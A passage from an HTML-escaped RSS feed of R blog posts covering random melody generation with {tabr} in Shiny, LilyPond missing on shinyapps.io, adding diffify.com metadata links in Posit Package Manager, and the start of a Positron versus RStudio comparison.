&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;notes &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;], &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#39;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get a valid musical string, we can do the following:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sample_notes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x, n) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(x, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n, replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;4&amp;#34;&lt;/span&gt;, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rand_melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_notes&lt;/span&gt;(notes, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rand_melody
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## [1] &amp;quot;b4&amp;quot; &amp;quot;c''4&amp;quot; &amp;quot;f'4&amp;quot; &amp;quot;g''4&amp;quot; &amp;quot;e'4&amp;quot; &amp;quot;b4&amp;quot; &amp;quot;a'4&amp;quot; &amp;quot;b4&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rand_melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/randomMelody-1.png"&gt;
&lt;p&gt;As a way of sampling melodies this is as simple as it gets. And it works
in an app quite nicely too:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tabr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;music&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;invalidateLater&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10000&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# sample a new melody every 10s&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_notes&lt;/span&gt;(notes, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;music &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;melody&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
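&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There were a couple of issues with the app (and I made it a bit more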
complicated before I realised this).&lt;/p&gt;
&lt;p&gt;The main issue was that, if I deployed to
&lt;a href="https://www.shinyapps.io/" rel="external"&gt;&lt;code&gt;shinyapps.io&lt;/code&gt;&lt;/a&gt;, LilyPond wasn’t available -
so to use the app for real, I would have had to take a laptop, rather
than just my phone, to the open-mic with me - and I’m a rather
heavy-handed pianist so something expensive could well have broken….&lt;/p&gt;
&lt;p&gt;The other issue was that rendering the music was a little slow and
updating the score was glitchy - a png is created on the server side and
transferred to the browser every 10 seconds. There are JavaScript
libraries that can render musical scores, for example, the Humdrum
library has a &lt;a href="https://plugin.humdrum.org/" rel="external"&gt;JavaScript plugin&lt;/a&gt;. Using
such a library would mean that our shiny app could transfer some Humdrum
notation to the browser, which might speed up rendering. The website for
the Humdrum plugin includes an
&lt;a href="https://plugin.humdrum.org/topic/shiny/" rel="external"&gt;example&lt;/a&gt; of how to use it in a
Shiny app - however, extending these examples to dynamically update
after a new melody was sampled didn’t work for me. So, my next project
is to work out how to write an
&lt;a href="https://www.htmlwidgets.org/" rel="external"&gt;htmlwidget&lt;/a&gt; package for Humdrum….&lt;/p&gt;
&lt;h2 id="endtroducing-why-didnt-the-app-deploy"&gt;Endtroducing: Why didn’t the app deploy?&lt;/h2&gt;
&lt;p&gt;When you deploy an app to &lt;code&gt;shinyapps.io&lt;/code&gt;, any packages it depends upon
are installed on the &lt;code&gt;shinyapps.io&lt;/code&gt; server. This would typically include
{shiny}, {bslib} and a few other app-related things, but could include
packages for any number of other things: numerics, data processing,
visualisation. Many of these packages will depend on system libraries -
the {quarto} package requires the Quarto command-line tool to be
installed on a machine, for example. These system dependencies are
encoded in the &lt;code&gt;SystemRequirements&lt;/code&gt; section of the R package
&lt;code&gt;DESCRIPTION&lt;/code&gt; file, the same content you see on CRAN when looking at a
single package. For
&lt;a href="https://cran.r-project.org/web/packages/quarto/" rel="external"&gt;{quarto}&lt;/a&gt;, for
example, the &lt;code&gt;SystemRequirements&lt;/code&gt; state “Quarto command line tool
(&lt;a href="https://github.com/quarto-dev/quarto-cli" rel="external"&gt;https://github.com/quarto-dev/quarto-cli&lt;/a&gt;).”&lt;/p&gt;
&lt;p&gt;Now, the &lt;code&gt;SystemRequirements&lt;/code&gt; is a freely-structured text field. As a
package author you can write whatever you want in there, and it is up to
the users of your package to ensure that their system has the
&lt;code&gt;SystemRequirements&lt;/code&gt; available. This makes sense because on different
operating systems, the system libraries have different names. But it’s a
little problematic when attempting to deploy to a server - if you need
an R package that has a system-requirement that isn’t already available
on that server, and you can’t log in to the server to install system
libraries, how do you ensure it gets installed?&lt;/p&gt;
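&lt;p&gt;To see what that free text looks like, here is a minimal sketch that writes a
made-up &lt;code&gt;DESCRIPTION&lt;/code&gt; file to a temporary location and reads the field back
with base R’s &lt;code&gt;read.dcf()&lt;/code&gt;. The package name and the field contents are
invented for illustration; they are not copied from {tabr}.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# A hypothetical DESCRIPTION file, for illustration only
desc_file &amp;lt;- tempfile()
writeLines(
  c(
    &amp;quot;Package: mypkg&amp;quot;,
    &amp;quot;Version: 0.1.0&amp;quot;,
    &amp;quot;SystemRequirements: LilyPond (optional, for rendering sheet music)&amp;quot;
  ),
  desc_file
)

# read.dcf() returns a character matrix with one column per requested field
sysreqs &amp;lt;- read.dcf(desc_file, fields = &amp;quot;SystemRequirements&amp;quot;)
sysreqs[1, &amp;quot;SystemRequirements&amp;quot;]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For a package that is already installed,
&lt;code&gt;utils::packageDescription(&amp;quot;tabr&amp;quot;)$SystemRequirements&lt;/code&gt; should return
the same field without needing to find the file yourself.&lt;/p&gt;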
&lt;p&gt;The &lt;a href="https://pak.r-lib.org/" rel="external"&gt;{pak}&lt;/a&gt; package helps here. This provides an
enhanced way to install R packages. When {pak} installs packages, it
uses the free-text &lt;code&gt;SystemRequirements&lt;/code&gt; field to determine the
OS-specific system libraries that an R package needs. It does this by
making use of rules specified in the
&lt;a href="https://github.com/r-hub/r-system-requirements/tree/pak/rules" rel="external"&gt;r-hub/r-system-requirements&lt;/a&gt;
repository. This is outlined in a &lt;a href="https://blog.r-hub.io/2023/09/26/system-dependency/" rel="external"&gt;blog
post&lt;/a&gt; by Hugo
Gruson.&lt;/p&gt;
&lt;p&gt;Ultimately, what happened is that while {pak} was installing the R
packages for my {tabr}-dependent app on &lt;code&gt;shinyapps.io&lt;/code&gt;, it saw that there
was a dependency on LilyPond, but because there is no LilyPond rule at
&lt;code&gt;r-hub/r-system-requirements&lt;/code&gt;, it couldn’t work out what libraries or
system tools it needed to install. So {tabr} installed, but the
‘lilypond’ library that it depends upon didn’t.&lt;/p&gt;
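&lt;p&gt;If you want to check this sort of thing before deploying, {pak} can report what
it has worked out. The sketch below assumes a recent {pak} (0.6.0 or later, where
I believe the system-requirements helpers were added), network access, and an
Ubuntu 22.04 target; the platform string is an assumption for illustration, not
something taken from the &lt;code&gt;shinyapps.io&lt;/code&gt; documentation.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumes {pak} &amp;gt;= 0.6.0 is installed and the machine is online
library(&amp;quot;pak&amp;quot;)

# System packages {pak} would install for {tabr} and its dependencies
pkg_sysreqs(&amp;quot;tabr&amp;quot;, sysreqs_platform = &amp;quot;ubuntu-22.04&amp;quot;)

# Match a free-text SystemRequirements string against the rules database;
# if no rule recognises the text, no system packages are suggested for it
sysreqs_db_match(&amp;quot;LilyPond&amp;quot;, sysreqs_platform = &amp;quot;ubuntu-22.04&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The results depend on the state of the rules repository when you run this, so
treat the output as a snapshot rather than a guarantee.&lt;/p&gt;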
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/music-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify &amp; Posit Package Manager</title><link>https://www.jumpingrivers.com/blog/diffify-posit-package-manager/</link><pubDate>Thu, 12 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-posit-package-manager/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-posit-package-manager/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-posit-package-manager/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://docs.posit.co/rspm/news/package-manager/#posit-package-manager-2024110" rel="external"&gt;latest release&lt;/a&gt; of Posit Package Manager introduces several enhancements, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Python Git Builders:&lt;/strong&gt; Build Python packages (wheels) directly from Git.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Blocklists:&lt;/strong&gt; Easily block specific packages or versions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Documentation:&lt;/strong&gt; Clearer and more accessible information.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All great stuff, I&amp;rsquo;m sure, but most of it doesn&amp;rsquo;t directly impact the end user.
The exception is the ability to add custom metadata to a package page.&lt;/p&gt;
&lt;h1 id="what-is-package-metadata"&gt;What is Package Metadata?&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://docs.posit.co/rspm/admin/metadata/metadata/" rel="external"&gt;Custom metadata&lt;/a&gt; lets administrators define key-value pairs for packages. For instance, you could tag packages as part of the tidyverse with &lt;code&gt;is_tidyverse: TRUE|FALSE&lt;/code&gt;. Other use cases include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Assigning scores to packages.&lt;/li&gt;
&lt;li&gt;Linking additional documentation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Metadata can apply globally (e.g., all versions of &lt;code&gt;{dplyr}&lt;/code&gt;) or to specific versions in a repository.&lt;/p&gt;
&lt;h1 id="how-to-add-metadata"&gt;How to Add Metadata&lt;/h1&gt;
&lt;p&gt;Metadata is added via the API. Start by creating a token:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Care should be taken over expires and scope&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rspm create token --scope&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;global:admin --expires&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;never --description&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Allows global admin access&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Generated an access token. Be sure to record this token immediately since you will not be able to retrieve it later.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will generate an access token (e.g., &lt;code&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&lt;/code&gt;).
As with most tokens, it&amp;rsquo;s not retrievable, so put it somewhere secure.&lt;/p&gt;
&lt;p&gt;Test the token on the API page, ensuring you prefix it with Bearer when authorizing.&lt;/p&gt;
&lt;img title = "Screenshot of Authorisation pop-up from Posit Package Manager" src="api-token.png" class="image-center" style="width: 450px;" /&gt;
&lt;p&gt;For example, a &lt;code&gt;/verify-auth&lt;/code&gt; GET request with a valid token should return a 200 response, confirming successful authorization.&lt;/p&gt;
&lt;h2 id="linking-with-diffifycom"&gt;Linking with diffify.com&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; website has a predictable URL structure: &lt;code&gt;diffify.com/language/package-name/old-version/new-version&lt;/code&gt;, where&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;language:&lt;/strong&gt; either &lt;code&gt;r&lt;/code&gt; or &lt;code&gt;python&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;package-name&lt;/strong&gt;: name of the R or Python package&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;versions:&lt;/strong&gt; Optional, specify one or both.&lt;/li&gt;
&lt;/ul&gt;
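&lt;p&gt;Because the structure is predictable, links can be generated rather than typed by hand. The helper below is a hypothetical base-R sketch (&lt;code&gt;diffify_url()&lt;/code&gt; is not part of any package); it simply pastes together the pieces described above.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: build a diffify.com link from its parts
diffify_url &amp;lt;- function(package, language = c(&amp;quot;r&amp;quot;, &amp;quot;python&amp;quot;),
                        old_version = NULL, new_version = NULL) {
  language &amp;lt;- match.arg(language)
  # c() drops NULLs, so any version that is not supplied is left out of the path
  parts &amp;lt;- c(&amp;quot;https://diffify.com&amp;quot;, language, package, old_version, new_version)
  paste(parts, collapse = &amp;quot;/&amp;quot;)
}

diffify_url(&amp;quot;datasauRus&amp;quot;)
diffify_url(&amp;quot;datasauRus&amp;quot;, old_version = &amp;quot;0.1.2&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first call gives the package-level link and the second a version-specific one, which is handy if you are generating links for many packages at once.&lt;/p&gt;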
&lt;h2 id="diffifycom--posit-package-manager"&gt;diffify.com &amp;amp; Posit Package Manager&lt;/h2&gt;
&lt;p&gt;Adding the diffify links to PPM is performed using the&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;POST &lt;code&gt;/metadata/records/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and/or&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;POST &lt;code&gt;/metadata/records/bulk&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;API calls. Depending on how precise you want to be you can either add a global meta tag, e.g.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Diffify: &lt;a href="https://diffify.com/r/datasauRus" rel="external"&gt;https://diffify.com/r/datasauRus&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which would work for all versions of the package.
This is less work for the admin, but the user has to perform an extra click.&lt;/p&gt;
&lt;p&gt;Or specify the version number in the URL,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Diffify: &lt;a href="https://diffify.com/r/datasauRus/0.1.2" rel="external"&gt;https://diffify.com/r/datasauRus/0.1.2&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which is more work for the admin, but nicer for the user. The end result after this hard work
is a nice link near the top of the page.&lt;/p&gt;
&lt;img title = "Final product with {datasauRus} diffify link" src="datasauRus.png" class="image-center" style="width: 550px;" /&gt;
&lt;p&gt;To learn more about &lt;a href="https://diffify.com/" rel="external"&gt;diffify.com&lt;/a&gt;, check out our blog posts &lt;a href="https://www.jumpingrivers.com/blog/?search=diffify" rel="external"&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-posit-package-manager/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Positron vs RStudio - is it time to switch?</title><link>https://www.jumpingrivers.com/blog/why-move-to-positron-r/</link><pubDate>Thu, 05 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-move-to-positron-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-move-to-positron-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://positron.posit.co/" rel="external"&gt;Positron&lt;/a&gt; is the new beta Data Science IDE
from &lt;a href="https://posit.co/" rel="external"&gt;Posit.&lt;/a&gt; Though Posit have stressed that
maintenance and development of RStudio will continue, I want to use this
blog to explore if Positron is worth the switch. I’m coming at this from
the R development side but there will of course be some nuances from
other languages in use within Positron that require some thought.&lt;/p&gt;
&lt;p&gt;And I hope to put out another version of this for Python!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-why-move-to-positron-r"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-polyglot-ide"&gt;A “polyglot” IDE&lt;/h3&gt;
&lt;p&gt;Whilst RStudio is an IDE aimed at Data Science using R, Posit say that
Positron is an IDE aimed at “Data Science” using any programming
language i.e. a “polyglot” IDE. At the moment, it’s just R and Python
but with the possibility to extend. Its current target audience is those
Data Scientists who think RStudio is too niche yet &lt;a href="https://code.visualstudio.com/" rel="external"&gt;VS
Code&lt;/a&gt; is too general.&lt;/p&gt;
&lt;p&gt;Everything inside the RStudio window, for all its beauty, is run using
one R process. This is why when R crashes, RStudio does too. However,
Positron is built using the same base as VS Code (a fork of Code OSS)
which enables Positron to run R (and Python) through communication with
a kernel. Sparing you the gory details, for us programmers it means we
have the incredible ability to be able to switch between not only
versions of R, but other languages too. All through just two clicks of a
button!&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/kernel-switch.png" alt="GUI for switching kernel from R to Python." width="300px" style="display: block; margin: auto;" /&gt;
&lt;h3 id="settings-and-the-command-palette"&gt;Settings and the command palette&lt;/h3&gt;
&lt;p&gt;Like RStudio, there is a command palette to manage settings and initiate
operations. Though I confess, I didn’t actually know this about RStudio
until I wrote this blog. That’s also the key difference. In Positron,
the command palette is the primary way to manage settings, and there’s a
very clear prompt at the top of the screen. In RStudio it feels more
like a hidden feature.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/command-palette.png" alt="Positron command palette." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Also, by default Positron does not save your .RData to your workspace,
nor does it ask you! You can change this if you want.&lt;/p&gt;
&lt;h3 id="workspaces--r-projects"&gt;Workspaces / R projects&lt;/h3&gt;
&lt;p&gt;R projects are no longer the main way of grouping files. Instead,
Positron uses workspaces. A workspace is analogous to any folder on your
device. By default the working directory is set to whichever folder you
have open. I’ve found this useful, as it means I don’t need to create an
&lt;code&gt;.Rproj&lt;/code&gt; file to reap (&lt;em&gt;most of&lt;/em&gt;) the benefits of project-based
development. As you can see below, there are a LOT of hints that opening
a folder is the best way to work in Positron.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/new-project-big.png" alt="Starting a new project in Positron." style="display: block; margin: auto;" /&gt;
&lt;p&gt;If you still need an R project file, then Positron provides the ability
to create these too (but it doesn’t really mean anything in Positron).&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/new-r-project.png" alt="GUI for selecting Python, R or Jupyter Notebook project." style="display: block; margin: auto;" /&gt;
&lt;h3 id="layout"&gt;Layout&lt;/h3&gt;
&lt;p&gt;The biggest difference in layout is the addition of the sidebar to the
left. This houses the (more advanced) file explorer, source control,
search and replace, debug and extensions. We’ll talk about each one of
these in turn throughout the blog.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/sidebar-layout.png" alt="Positron file viewer." class="image-center" style="width: 330px"/&gt;
&lt;p&gt;The file explorer is a big plus for me. Firstly, it is just easier to
work with and takes up less real estate. But it also directly integrates
with the source control and the R interpreter. This means you have live
feedback for the git status of your files and if your interpreter has
detected any problems. Whilst this is nice, it does mean Positron will
nearly always indicate there are problems with your code before any code
has been run.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/sidebar-using-code.png" alt="Whole view of Positron whilst file viewer is open." style="display: block; margin: auto;" /&gt;
&lt;p&gt;For the configuration of the panes etc, check out the layout options in
the command palette. I’m using the “Side-by-Side Layout” and have
dragged the “variables” and “plots” panes next to the console.&lt;/p&gt;
&lt;h3 id="extensions"&gt;Extensions&lt;/h3&gt;
&lt;p&gt;As Positron is made from the same stuff as VS Code, we now get VS Code
extensions, but only from the &lt;a href="https://open-vsx.org/" rel="external"&gt;OpenVSX&lt;/a&gt;
marketplace. Still, there’s nearly everything you could ever want in
there. Including themes, rainbow CSV, and Git integrations.&lt;/p&gt;
&lt;h3 id="using-git"&gt;Using Git&lt;/h3&gt;
&lt;p&gt;I think this one will divide people. I very much enjoy the RStudio Git
GUI - the simplicity of it is probably its best feature and definitely
what I will miss the most. However, it was limited. Positron’s “source
control” section gives you far more control over what you can do using
Git without having to head to the terminal.&lt;/p&gt;
